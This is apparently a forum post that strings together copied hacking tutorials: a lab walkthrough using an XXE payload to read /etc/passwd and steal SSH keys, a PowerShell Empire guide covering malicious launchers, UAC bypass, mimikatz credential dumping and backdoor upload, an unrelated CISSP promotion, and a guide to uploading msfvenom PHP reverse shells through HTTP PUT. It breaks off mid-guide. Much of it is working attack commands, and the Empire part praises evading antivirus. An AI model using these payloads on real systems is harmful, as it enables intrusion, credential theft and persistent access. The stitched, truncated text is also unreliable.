05-14-2020, 09:53 AM
| 0 | 0 | ||
Level: Medium
Task: To find user.txt and root.txt file
Note: Since these labs are online available therefore they have a static IP. The IP of DevOops is 10.10.10.91
Table of Content
Scanning
- Open ports and Running services (Nmap)
- Web Directory spidering
- Upload XML file
- Intercept Browser request (Burp Suite)
- Access /etc/passwd file
- Steal SSH RSA key
- Capture user.txt flag
- Capture root.txt flag
Scanning
Let’s start off with our basic nmap command to find out the open ports and services.
nmap -p- -A 10.10.10.91 --open
1
nmap -p- -A 10.10.10.91 --open
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-_EbHbPEMpDY/W8NQmtTZcOI/AAAAAAAAasQ/hlNI2Ydq_5cvJllEZvWJqh-Wag-5iaqOwCEwYBhgL/s1600/1.png?w=687&ssl=1)
From Nmap scanning, we have enumerated port 22 and 5000 are only open ports on the target’s network, therefore firstly, let’s navigate to port 5000 through a web browser. By exploring the given URL, it puts up following web page as shown in the below image.
[To see content please register here]
1
[To see content please register here]
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-a7ZQ6jV_-tE/W8NQoG24D1I/AAAAAAAAaso/_fTrCrYfQCsKlOS3lRlWJMnittC494acwCEwYBhgL/s1600/2.png?w=687&ssl=1)
Enumeration
Since we didn’t get any remarkable clue from the home page, therefore, we have opted Dirb tool for directory enumeration thus execute the following command.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
Hmm!! Here I received HTTP response 200 for /feed and /upload directories.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-k6HPOEvAbnE/W8NQoV-IDqI/AAAAAAAAass/kzsOcN9f5TQgvke9Wiwn4bAtldXCwC_0gCEwYBhgL/s1600/3.png?w=687&ssl=1)
So we explore
[To see content please register here]
/upload in the URL and further welcomed by following web Page given below. The following web page lets you upload an XML file, including XML elements Author, Subject and content. For that reason, we have created an XML file with the help of the following code and saved as 1.xml.<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
<Author>raj</Author>
<Subject>chandel</Subject>
<Content>&xxe;</Content>
</feed>
1
2
3
4
5
6
7
8
9
10
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<feed>
<Author>raj</Author>
<Subject>chandel</Subject>
<Content>&xxe;</Content>
</feed>
Then browse the XML file, which you have created and intercept the browser request with the help of burp suite while uploading.
![[Image: 4.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-WYz0USVJ9EQ/W8NQodnsruI/AAAAAAAAasw/PD45FE4jyMMCCt2kNY156wvKhnzIcdtZQCEwYBhgL/s1600/4.png?w=687&ssl=1)
EXPLOIT XXE (XML External Entity)
Now send the intercepted data to the repeater.
Inside XML file, we have injected malicious code to make the call for /etc/passwd file, thus, we need to analyze its result in the repeater.
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-R5YVd1SWBqM/W8NQo1FMcyI/AAAAAAAAas0/FqHAKTyXlakA5JaD-5MnDIdpqyzh16cGwCEwYBhgL/s1600/5.png?w=687&ssl=1)
And as you can observe from the given below image, the XML code is working wonderfully and throwing the content of /etc/passwd file to us.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-5T6WZQMiNFA/W8NQpVMrV_I/AAAAAAAAas8/n0-Kv5m1ZokJgBq9bcQr8zBTH2gVVBjhwCEwYBhgL/s1600/6.png?w=687&ssl=1)
Similar, we extract the SSH RSA key by modifying XXE entry as shown in the below image. Now copy the whole key and save in a text file.
![[Image: 7.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-3x1zdy1vgDM/W8NQpJRBZTI/AAAAAAAAas4/q0IryfUHPfwBFgDUgtuVmNGftKFGgejIgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Access Victim’s Shell
Since we have copied RSA Private KEY in a text file named as “key”, then set permission 600 and try to login with the help of the following command.
chmod 600 key
ssh -i key [email protected]
1
2
chmod 600 key
ssh -i key [email protected]
Boom!! We have spawned a shell of target machines, let’s go for the user.txt file.
cd /home
ls
cd roosa
ls
cat user.txt
1
2
3
4
5
cd /home
ls
cd roosa
ls
cat user.txt
![[Image: 9.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-6KIBvMjjmPY/W8NQpX-Rv-I/AAAAAAAAatA/eaXqfr3PoNgQy_3Kya3Yptrxved6QrpWwCEwYBhgL/s1600/9.png?w=687&ssl=1)
Privilege Escalation
Great!!! We have completed the first task but for obtaining root.txt file we need to escalate the root privilege and to do so we traversed so many directories and files to get next clue.
cd work
ls
cd blogfeed/
ls
cat run-gunicorn.sh
cd resources
ls
1
2
3
4
5
6
7
cd work
ls
cd blogfeed/
ls
cat run-gunicorn.sh
cd resources
ls
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-xb6hULfCa1w/W8NQm7nu6NI/AAAAAAAAasU/WMZd4FPnaBUeECaJyddUuAfxxO8h6CcBACEwYBhgL/s1600/10.png?w=687&ssl=1)
so we found .git directory here lets check git with the following command.
git log
1
git log
And we obtain so many strings as shown in the following image which may perhaps SSH key for root login.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-1sR7PgKM5zk/W8NQnHBa7FI/AAAAAAAAasY/svfDJEmurr480GD9LX5OvRQfnyKf8WvJgCEwYBhgL/s1600/12.png?w=687&ssl=1)
So we try some key along git show command to demonstrate the output result. And obtain RSA Private Key which was not working properly.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-cqmvBD1o5bY/W8NQnVJ8trI/AAAAAAAAasc/2n0V0KHh5q47slJw7Z_sON_bIqbSqncpgCEwYBhgL/s1600/13.png?w=687&ssl=1)
And finally, we got the original RSA Key which is highlighted in Red text, now copy the red color text a file and remove ‘–’ used in each line instead add “—–END RSA PRIVATE KEY—–”
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-hODff1MuoAs/W8NQn1TKgLI/AAAAAAAAask/YlHcDSIBpRcZPcRMYiIkb5jpaN5sdcQjwCEwYBhgL/s1600/14.png?w=687&ssl=1)
Since we have copied RSA Private KEY in a text file named as “rootkey” then set permission 600 and try to login with the help of the following command.
chmod 600 key
ssh -i rootkey [email protected]
ls
cat root.txt
1
2
3
4
chmod 600 key
ssh -i rootkey [email protected]
ls
cat root.txt
Congrats!! We have found root.txt and from the image below you can see we have obtained the value of root.txt.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-In-acK-Hc20/W8NQn7td6-I/AAAAAAAAasg/8DW5SfFsaVEbaOp6UA3tKSHbFOhRK7FYgCEwYBhgL/s1600/15.png?w=687&ssl=1)
Our today’s article is the first post of our Empire series. In this, we will cover every basic you need to know about the PowerShell Empire Framework. And with the eventually, we study advance exploits of Empire.
Table of Content:
- Introduction
- Installation
- Importance
- Terminology
- Demo
- Conclusion
Empire is a post-exploitation framework. It’s a pure PowerShell agent, focused solely on python with cryptographically-secure communications with the add-on of a flexible architecture. Empire has the means to execute PowerShell agents without the requirement of PowerShell.exe. It can promptly employ post-exploitable modules, which covers a vast range from ranging from keyloggers to mimikatz, etc. This framework is a combination of the PowerShell Empire and Python Empire projects; which makes it user-friendly and convenient. PowerShell Empire came out in 2015 and Python Empire came out in 2016. It is similar to Metasploit and Meterpreter. But as it is command and control tool, it allows you to control a PC much more efficiently.
Importance
PowerShell provides abundant offensive advantages which further includes the whole access of .NET, applock whitelisting, and straight access to Win32. It also constructs malicious binaries in memory. It provides C2 functionality and allows you to implant the second stage after the first one. It can also be used for lateral movement. And it comes handy as it develops rapidly in comparison to other frameworks. Also, as it does not requires PowerShell.exe, it lets you bypass anti-viruses. Hence, it is best to use the PowerShell Empire.
Terminology
Before starting with the action you need to know these four things:
- Listener: the listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker’s computer.
- Stager: A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
- Agent: An agent is a program that maintains a connection between your computer and the compromised host.
- Module: These are what execute our malicious commands, which can harvest credentials and escalate our privileges as mentioned above.
You can download Empire from
[To see content please register here]
. Clone the command from the hyperlink provided for GitHub or simply use google.Use the following command to download it:
git clone //github.com/EmpireProject/Empire.git
1
git clone //github.com/EmpireProject/Empire.git
![[Image: 1.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-kb0xPUsnfqo/XFLz_o6Mf7I/AAAAAAAAcf0/wdOcxDFNTlIElEv-QJI9J9LWnXARnb9rgCLcBGAs/s1600/1.png?w=687)
Once the downloaded is initiated and completed, follow steps given directly below in order to install it :
cd Empire/
ls
cd setup/
ls
./install.sh
1
2
3
4
5
cd Empire/
ls
cd setup/
ls
./install.sh
![[Image: 2.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-3kXsXeA4pC8/XFL0CS3XqiI/AAAAAAAAcgU/1pEeZTVaN4gO8KiPUw6NsR5KeLr1MCxkgCLcBGAs/s1600/2.png?w=687)
Wait for it to complete the installation. This might take a few seconds. It will prompt you for a password.
In my case, my password was toor.
Once the installation is done, move back a directory and run empire using ./empire.
Now use Help command as it opens up all the essential options required initially.
![[Image: 3.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-d8ni0QUi_m0/XFL0CclGrfI/AAAAAAAAcgc/s3WcR_3bBPobGFiJ--Dsf11dDpdf3focQCLcBGAs/s1600/3.png?w=687)
According to the workflow, firstly, we have to create a listener on our local machine. Type the following command:
listeners
1
listeners
After running the above command, it will say that “no listeners are currently active” but don’t worry, we are into the listener interface now. So in this listener interface, type :
uselistener <tab> <tab>
1
uselistener <tab> <tab>
![[Image: 4.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-_fTeY3Ywa-4/XFL0CYWLlsI/AAAAAAAAcgY/GgKrmDIlZUYxLqWbVZ4vDNvcnXHRl7vpgCLcBGAs/s1600/4.png?w=687)
The above command will list all the listeners that one can use, such as dbx, http, http_com, etc. The most popular and commonly used listener is http and we will use the same in our practice. For that type :
uselistener http
1
uselistener http
This command creates a listener on the local port 80. If port 80 is already busy by a service like Apache, please make sure you stop that service as this listener being http listener will only work on port 80. Now to see all the settings that you ought to provide in this listener type :
info
1
info
As you can see in the image that there are a variety of settings you can use to modify or customize your listener. Let’s try changing the name of our listener as it helps to remember all the listeners that are activated; if activated in bulk. So for this, type :
set Name test
1
set Name test
The above command will change the listeners’ name from http to test.
Usually, this listener automatically takes up the local host IP but, just in case, you can use the following command to set your IP :
set Host //192.168.1.107
execute
1
2
set Host //192.168.1.107
execute
Above command will execute the listener. Then go back and use PowerShell listener as shown in the image.
![[Image: 5.png?w=687]](https://i2.wp.com/4.bp.blogspot.com/-s4kEOLyRGRU/XFL0DIGP-cI/AAAAAAAAcgg/4GCAfOrW6YwzCrPTCm10ZDBOzG5ii5UCACLcBGAs/s1600/5.png?w=687)
Now type ‘back’ to go back from the listener interface so that we can execute our modules. Use the following command to see all the modules that the empire provides:
usestager <tabt> <tab>
1
usestager <tabt> <tab>
As you can see in the image below that there are a lot of modules for both windows and IOS along with some multi ones that can be used on any platforms. We will use launcher_bat to create malware and exploit our victims’ PC in our tutorial. And for that type:
usestager windows/launcher_bat
1
usestager windows/launcher_bat
Then again type ‘info’ in order to see all the settings required by the exploit. After examining you will see that we only need to provide listener. Therefore, type :
set Listener test
execute
1
2
set Listener test
execute
![[Image: 6.png?w=687]](https://i1.wp.com/1.bp.blogspot.com/-8GC5G1v_KNU/XFL0Df6RNzI/AAAAAAAAcgo/l6aeNEIhzDIj2BQ0D0zOropqkZaU2kdeACLcBGAs/s1600/6.png?w=687)
![[Image: 7.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-4Qz2ZCt3UYg/XFL0DUztQFI/AAAAAAAAcgk/k4Ia1WzLBHAQ0-fw0PhR1IVSlnIKz6nQgCLcBGAs/s1600/7.png?w=687)
The above two commands will execute our exploit after setting the listener test and create /tmp/launcher.bat. Use the python server to execute this file in victims’ PC. As the file will execute, you will have a session. To check your session type:
agents
1
agents
With the above command, you can see that you have a session activated. You can change the name of your session as the name given by default is pretty complicated and difficult to remember. To do so type:
rename ZAF3GT5W raajpc
1
rename ZAF3GT5W raajpc
Use the following to access the session:
interact raajpc
1
interact raajpc
Once you have gained access to the session, try and get admin session by using the following command:
bypassuac http
After executing the bypassuac command another session will open. Rename that session too by typing :
rename HE3K45LN adminraj
1
rename HE3K45LN adminraj
![[Image: 8.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-VrhR5HZlCfc/XHFl-fEMcWI/AAAAAAAAc9w/i5fFxcowU6kMMA9zM_nlccTkmifEnWObwCLcBGAs/s1600/8.png?w=687)
Let’s
interact with adminraj now.
interact adminraj
1
2
interact with adminraj now.
interact adminraj
<tab><tab>helps us view all the options in the shell. There are several options which is quite helpful to for post exploitation. Such as info, job, list and etc as shown in the image.
Info: for all the basic details like IP, nonce, jitter, integrity etc.
![[Image: 9.png?w=687]](https://i0.wp.com/2.bp.blogspot.com/-O0t-lLeLWGA/XFL0D1HiqJI/AAAAAAAAcgw/dFt5zhcL8nYj6NwZuLDQXSey8zdK_vLLgCLcBGAs/s1600/9.png?w=687)
Now if you use ‘help’ command, you will be able to see all the executable commands.
![[Image: 10.1.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-xUQKlVc2ZLI/XFLz_hohXrI/AAAAAAAAcfs/u0J0YZMzJ3EKltz1KqhNzoXxYQbIHZ8HwCLcBGAs/s1600/10.1.png?w=687)
Let’s try and run mimikatz to get the password of the user. Since mimikatz won’t run on a normal guest user shell and will only run on the admin shell; this also proves that we have to achieve admin access so that we can use mimikatz.
Hmmmm!! And the password is “123” for user raj.
![[Image: 10.png?w=687]](https://i0.wp.com/3.bp.blogspot.com/-zRAujpU5H3k/XFLz_tAf41I/AAAAAAAAcfw/Z7cM7LKX08Uwj1nQ2hUQa2tcaUYyrOzywCLcBGAs/s1600/10.png?w=687)
creds
Above command will dump the credentials or password of any user in both plaintext and its hash as well.
Another important command is the shell command.
To use the shell of the victim to run proper Microsoft windows commands, we use this feature.
Eg: one such window’s cmd only command is netstat
shell netstat -ano
1
shell netstat -ano
And as expected, the above command showed us all the ports in work currently on the machine!
![[Image: 11.png?w=687]](https://i2.wp.com/3.bp.blogspot.com/-mMorvsHGp8U/XFL0AA7UCxI/AAAAAAAAcf4/mTPLM73UgqkL3nDzC0CZOXKLGcuGuBaHwCLcBGAs/s1600/11.png?w=687)
Now, since the default shell directory in windows is “C:/windows/system32”; let’s try and move into another directory and try to download some file from there and also we can upload something at that location, for example, we can upload a backdoor! Now, use the following commands for it :
shell cd C:\Users\raj\Desktop
shell dir
download 6.png
1
2
3
shell cd C:\Users\raj\Desktop
shell dir
download 6.png
Above command will download an image called 6.png from the window’s desktop to the “downloads directory of Empire”
upload /root/Desktop/revshell.php
1
upload /root/Desktop/revshell.php
Here we can upload any backdoor, with help of above command we are uploading a php backdoor from Kali’s desktop to victim’s desktop and we can even invoke this file since we have the shell access!
![[Image: 12.png?w=687]](https://i2.wp.com/2.bp.blogspot.com/-X1s-YWC1Xj4/XFL0Ad6DoAI/AAAAAAAAcgA/Avx78M4YfiAXWq3h0n3ZdxK-OMZMqzPtQCLcBGAs/s1600/12.png?w=687)
This is where the downloaded files will go:
Empire directory/downloads/<agent name>/<agent shell location>
![[Image: 13.png?w=687]](https://i1.wp.com/3.bp.blogspot.com/-xcgY1gDBusQ/XFL0AVt1kQI/AAAAAAAAcf8/ypsDs9J7nPUFNPP6ZdL6NalmMyzPcfN-QCLcBGAs/s1600/13.png?w=687)
shell dir
1
shell dir
Above command proves that we indeed have uploaded revshell.php
And there it is! Revshell.php on the desktop of victim’s machine which our backdoor file.
![[Image: 14.png?w=687]](https://i0.wp.com/4.bp.blogspot.com/-7AWWXjwfZDk/XFL0A4BNkcI/AAAAAAAAcgE/qhQR92UguCchbz1rgR486FutoET9lJZqwCLcBGAs/s1600/14.png?w=687)
Previously shown were the basic demo of empire and its different terms used and how to use them. There is another term too, i.e. usemodule. Lastly, let’s see how to use it.
usemodule <tab> <tab>
1
usemodule <tab> <tab>
The command will show you all the modules available and ready to use as shown in the image below:
![[Image: 15.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/-aOtqoWHNG8s/XFL0BTFzhdI/AAAAAAAAcgI/S-WzclFtJucehgAvb1hlmtbzqC_n0itUACLcBGAs/s1600/15.png?w=687)
Following is a small demo of how to use usemodule. Type :
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
1
2
3
4
usemodule trollsploit/message
set MsgText you have been hacked
execute
y
![[Image: 16.png?w=687]](https://i1.wp.com/4.bp.blogspot.com/-6IbGGv3fPhs/XFL0BjvFu3I/AAAAAAAAcgM/S4fj_0ifqQA_Z6lDyXhWWMcK4gTCOiQaACLcBGAs/s1600/16.png?w=687)
Using the above module will display a message on victims’ PC as shown image below :
![[Image: 17.png?w=687]](https://i1.wp.com/2.bp.blogspot.com/--t6ETMHrT1c/XFL0B4_4W1I/AAAAAAAAcgQ/C6zgUrEZyW8T8hp1HO_HopvLfOoi_SSAACLcBGAs/s1600/17.png?w=687)
Conclusion
Malware in the form of .exe/dll/hta etc. allows an attacker to construct any desirable attack as this framework has access to Win32. Although anti-virus companies are becoming aware day by day, these ones are still valid. It’s a great tool due to its vast, authentic and efficient collection of post-exploits. Ultimately, the goal is to be undetected and successful in your attack and this tool allows us to do so. And this article covered all the basics you need to know about this framework.
Happy Hacking!!
f
Every business organization seeks safety and security of its internal information. It is essential to ensure that the data is protected from malicious attackers who easily breach into the network through use of unfair practices. Maintaining a secure information security policy and hiring the right bunch of qualified professionals is of prime importance to any organization who intend to prevent their internal servers and systems from being compromised. Such professionals ensure that the software installations are up-to-date and build in security layers which become difficult for cyber attackers to intrude into the network.
What is CISSP?
The full form of CISSP is Certified Information Systems Security Professional. This certification is conferred by the International Information Systems Security Certification Consortium (ISC)², which is a global non-profit organization specializing in IT security. (ISC)² is rendered as one of the world’s largest Information Security organization which offers a variety of security certifications like CISSP, CSSLP, and CAP.
As an Information Security aspirant, there are multiple benefits of obtaining a CISSP certification which you simply cannot ignore. Let’s discuss some of the topmost reasons to earn such a certification and discover how a CISSP is integral for any business organization and act as a key component in the selection procedure for managerial-level information security positions.
- Global Recognition
[To see content please register here]
is a good move for a flourishing IT career. Reason being, CISSP provides industry-wide recognition and considered as the “Best Professional Certification Program” by SC Magazine. This certification is highly endorsed and recognized by well-known global MNCs like Google, IBM etc. It is ascertained that there is a projected requirement of about 56% of cyber experts in the current job market.- (ISC)² Membership
- Job Competency
[To see content please register here]
for software development, enterprise computing solutions in the production and operation environment.- Increased Earning Potential
- High Demand for Security Experts
Takeaway
Considering all these factors that has been discussed in this article, we can safely connote that obtaining a CISSP certification can certainly propel your IT career to a great extent. CISSP is thus, a very well-performing certification and once you are through the certification, it provides you a rewarding, lucrative and satisfying career path in the long run.
Author Bio: I am Maria Thomas, Content Marketing Manager and Product Specialist at
[To see content please register here]
with eight years rich experience on professional certification courses like PMI- Project Management Professional, PMI-ACP, Prince2, ITIL (Information Technology Infrastructure Library), Big Data, Cloud and Six Sigma.Hi Friends, today’s article is related to exploiting the HTTP PUT method vulnerability through various techniques. First, we will determine if the HTTP PUT method is enabled on the target victim machine, a post which we will utilize several different methods to upload a Meterpreter reverse shell on the target and compromise the same.
Table of Content
- Introduction to HTTP PUT Method
- Scanning HTTP PUT Method (Nikto)
- Exploiting PUT Method Using Cadaver
- Exploiting PUT Method Using Nmap
- Exploiting PUT Method Using Poster
- Exploiting PUT Method Using Metasploit
- Exploiting PUT Method Using Burpsuite
- Exploiting PUT Method Using Curl
PUT method was originally intended as one of the HTTP method used for file management operations. If the HTTP PUT method is enabled on the webserver it can be used to upload a malicious resource to the target server, such as a web shell, and execute it
As this method is used to change or delete the files from the target server’s file system, it often results in arising in various File upload vulnerabilities, leading the way for critical and dangerous attacks. As a best practice, the file access permissions of the organizations’ critical servers should be strictly limited with restricted access to authorized users, if in case the organization absolutely MUST have these methods enabled.
Note: In this tutorial, we are using a Vulnerable target machine for Pentesting purposes and to illustrate the use of various tools. This is purely meant for educational purposes in the testing environment and should not be used in a Production environment without the authorized permissions from the relevant authorities/management.
Requirements
Target: Metasploitable 2
Attacker: Kali Linux machine
Let’s Begin!!!!
Boot your Kali Linux machine (IP: 192.168.1.105) and in parallel, type victim IP as 192.168.1.103 in the Firefox browser and click on WebDAV. As we can see from the screenshot it is listing only the parent directory.
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-IAvnCT5J0D0/W77ri1o1mRI/AAAAAAAAaq0/r9dKhua-6iwzivv_6hHEIHMCueQuLH1kwCEwYBhgL/s1600/1.png?w=687&ssl=1)
First of all, we need to ensure that the vulnerable target machine has the HTTP PUT method allowed us to upload malicious backdoors. In order to confirm the same, we need to scan the target using Nikto.
Nikto is a popular Web server scanner that tests Web servers for dangerous files/CGIs, outdated server software and other issues. It also performs generic and server type specific checks. Below is the command to scan the URL:
nikto -h
[To see content please register here]
1
nikto -h
[To see content please register here]
Upon running the above command, we can observe that the highlighted part in below screenshot displays that the HTTP PUT method is allowed. Now let’s hack the vulnerable target machine by uploading the PHP malicious file, using the various techniques shown in upcoming sections.
![[Image: 2.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-_fKRSGfCCgA/W77rlIJD1XI/AAAAAAAAaqo/SA6dYhM9WtUVv3H6ryRskxjAktX8OgzmQCEwYBhgL/s1600/2.png?w=687&ssl=1)
Prepare the malicious file to be uploaded with msfvenom :
Msfvenom can be used to create PHP meterpreter payload that gives us a reverse shell. Execute the following command to perform the same
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw
1
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.105 lport=4444 -f raw
Copy the code from <?php to die() and save it in a file with .php extension as shell.php file , on the desktop .This will be utilized later in the upcoming sections, to upload the file on the web server.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-ai6_PuZKAtU/W77rl0U7yzI/AAAAAAAAaq0/_yom0zpAx4ID2rNrdTJvQvzx8WSLEKXBQCEwYBhgL/s1600/3.png?w=687&ssl=1)
In parallel, load the Metasploit framework by typing msfconsole on a new terminal and start multi/handler. This will be utilized in the later part of the section
Cadaver
Cadaver is a command line tool pre-installed in the Kali machine that enables the uploading and downloading of a file on WebDAV.
Type the target host URL to upload the malicious file, using the command given below.
cadaver
[To see content please register here]
1
cadaver
[To see content please register here]
Now once we are inside the victim’s directory, upload the file shell.php from the Desktop to the target machine’s path, by executing the below command :
put /root/Desktop/shell.php
1
put /root/Desktop/shell.php
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-orYWQsnvyQQ/W77rmHlDItI/AAAAAAAAaqI/PDRguU1qCtIyIFqsEWCcjV6Rh8dRAYQhQCEwYBhgL/s1600/4.png?w=687&ssl=1)
To verify whether the file is uploaded or not, run the URL: 192.168.1.103/dav/ on the browser. Awesome!!! As we can see, the malicious file shell.php has been uploaded on the web server.
![[Image: 5.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-yG32I2RGUeY/W77rmDmgKSI/AAAAAAAAaqs/Ss7Yu3qYMSgwizHtwTE6I0Z5x7pS0zL3wCEwYBhgL/s1600/5.png?w=687&ssl=1)
Now, let’s launch the Metasploit framework and start a handler using the exploit/multi/handler module. Assign the other values like the LHOST and LPORT values to the Kali machine’s IP and port to listen on, respectively. Once done, execute by running the command exploit to start listening for the incoming connections.
msf> use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.105
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
1
2
3
4
5
msf> use exploit/multi/handler
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.105
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
Press Enter and we will observe that the reverse TCP handler has been started on Kali IP 192.168.1.105:4444.
Now go back to the previously uploaded shell.php file and click on the same. Once run, we will get the TCP reverse connection automatically on the meterpreter shell. Further, run the sysinfo command on the meterpreter session to get machine OS/architecture details.
meterpreter>sysinfo
1
meterpreter>sysinfo
![[Image: 6.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-TvOtpJaXils/W77rmVp2B8I/AAAAAAAAaqw/H2g5L6Yr4CkURrBMgEWMxQX9I3gRuqrpwCEwYBhgL/s1600/6.png?w=687&ssl=1)
Nmap
Nmap is an opensource port scanner and network exploitation tool. If PUT Method is enabled on any web server, then we can also upload a malicious file to a remote web server with the help of NMAP. Below is the command to configure the same. We must specify the filename and URL path with NSE arguments. in parallel, prepare the malicious file nmap.php to upload to the target server.
nmap -p 80 192.168.1.103 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'
1
nmap -p 80 192.168.1.103 --script http-put --script-args http-put.url='/dav/nmap.php',http-put.file='/root/Desktop/nmap.php'
As seen from the below screenshot, the nmap.php file has been uploaded successfully.
![[Image: 7.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-els_LacO3vo/W77rm2psBgI/AAAAAAAAaqw/BrGv-I3DGBojQptXytnaLc3tYfS48w3rgCEwYBhgL/s1600/7.png?w=687&ssl=1)
Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot, the file nmap.php has been uploaded on the web server.
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/-LTOaoA34ITg/W77rnfaZ41I/AAAAAAAAaq0/09RjXZx37zUjv2wG6Mghh6LqTdweKZY9wCEwYBhgL/s1600/8.png?w=687&ssl=1)
Simultaneously, open Metasploit MSF console and use multi/handler; then go back to previously uploaded nmap.php file and run it. As can be seen below, this will give us a meterpreter session.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-KR1ALvq0nvc/W77rnECSIPI/AAAAAAAAaqY/jgYOrjezrww8MBqQRyIdNYM_T-cxoS5XQCEwYBhgL/s1600/9.png?w=687&ssl=1)
Poster
The poster is a Firefox Add-on and a developer tool for interacting with web services to let the end-user trigger the HTTP requests with parameters like GET, POST, PUT and DELETE and also enables to set the entity body, and content type
Prepare the malicious file poster.php that you would like to upload to the target machine. Install the Poster plug-in from Firefox Add-on. Click on the tools from the menu bar. And then click on Poster from the drop-down menu. The following dialog box will open. Type the URL as mentioned in the screenshot and provide the path of the malicious file to be uploaded via Browse option and finally click on PUT action.
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/3.bp.blogspot.com/-3184VfcbqFs/W77rjJrkjuI/AAAAAAAAaqg/UHEV0USTGnsw1IFAwPPjWQX4lFAyFeJSQCEwYBhgL/s1600/10.png?w=687&ssl=1)
Type the same URL in browser 192.168.1.103/dav and execute the same. As evident from the screenshot, the file poster.php has been uploaded on the web server.
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-C-tuuFu7ezs/W77rjMRoNNI/AAAAAAAAaq0/C0FT-zPRUnAt_u7EkhWgkoMu2NmkK1ovwCEwYBhgL/s1600/11.png?w=687&ssl=1)
Simultaneously, open Metasploit MSF console and use multi/handler; then go back to previously uploaded poster.php file and run it. This will give us a meterpreter session.
![[Image: 12.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-4VC6GAbwlk0/W77rjuzWlWI/AAAAAAAAaqk/2j4EUs3OEbs93k9oKaRFP0JjvvPrXUUngCEwYBhgL/s1600/12.png?w=687&ssl=1)
Burpsuite
Burpsuite is one of the most popular proxy interception tools whose graphical interface can be effectively utilized to analyze all kind of GET and POST requests.
Configure the manual proxy settings of end users’ browser so as to intercept the GET request Browse the URL
[To see content please register here]
but don’t hit ENTER yet. In parallel, let us navigate to the Burpsuite Proxy tab and click Intercept is on the option under the Intercept sub-option, to capture the request. As soon as we hit ENTER in the users’ browser, we will be able to fetch the data under the intercept window.Now right-click on the same window and a list of multiple options will get displayed. A further click on Send to the repeater.
![[Image: 13.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-ZwOoTL28hMg/W77rjvwmKPI/AAAAAAAAapY/bbI2afPf4NEQzq_uPTGcXGrE3LG4m2QvQCEwYBhgL/s1600/13.png?w=687&ssl=1)
In the below-highlighted screenshot, we will observe two panels – left and right for the HTTP Request and HTTP Response respectively. The GET method can be observed in the HTTP request and we will now replace GET with the PUT method in order to upload the file with name burp.php comprising of malicious content/code.
Type PUT /dav/burp.php HTTP/1.1 in the header and then paste the php malicious code starting from dav directory through PUT request.
![[Image: 14.png?w=687&ssl=1]](https://i0.wp.com/2.bp.blogspot.com/-qQhk13RoVhw/W77rjxnWxjI/AAAAAAAAaq0/8iBXssgaXX8I2-NiSK_TyR2PibAWuE5lwCEwYBhgL/s1600/14.png?w=687&ssl=1)
Verify and confirm the file upload by browsing the same URL 192.168.1.103/dav in the end users’ browser and we can see the burp.php file has been uploaded in the /dav directory of the web server.
![[Image: 15.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-AyBQmVxBQAU/W77rkCU45NI/AAAAAAAAaqs/cfwoBynG2s8BW8C_tjKKEtDCtOKXkBmNACEwYBhgL/s1600/15.png?w=687&ssl=1)
Simultaneously, open Metasploit MSF console and use multi/handler; then go back to previously uploaded burp.php file and run it. This will give us a meterpreter session.
